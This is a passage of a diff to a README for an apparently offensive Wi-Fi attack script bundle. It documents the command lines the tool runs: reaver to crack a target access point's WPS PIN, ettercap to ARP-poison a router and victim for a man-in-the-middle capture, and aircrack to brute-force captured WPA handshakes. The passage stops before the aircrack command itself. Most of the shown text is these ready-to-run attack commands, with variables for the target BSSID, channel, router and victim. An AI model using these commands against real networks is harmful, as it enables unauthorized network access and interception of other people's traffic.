smoz1986/WHAT-PRO/README.md

 reaver -i wlan0mon -b $bssidvar -vv -S -P -c $chanvar -d $delvar -o /root/wpslog/wpscrack/$filevar.log

 4. 'MITM-Ettercap' will intiate a MITM by Ettercap.
-The command line used is as follows:
+The command line used is as follows (two options):

-ettercap -T -i $intervar -M arp:remote -d -w /root/etterlog/$filevar.pcap /$routervar//$targetvar/
+ettercap -T -i $intervar -M arp:remote -w /root/etterlog/$filevar.pcap /$routervar//$targetvar/

+ettercap -T -i $intervar -M ARP -w /root/etterlog/$filevar.pcap /$routervar//$targetvar/

 5. 'AIRCRACK' will brute force the WPA key captured in any PCAPs acquired from a target AP.
 All four EAPOLs from an AP and client from a single authentication and a very good wordlist will be required for this to work.
 Command line is as follows: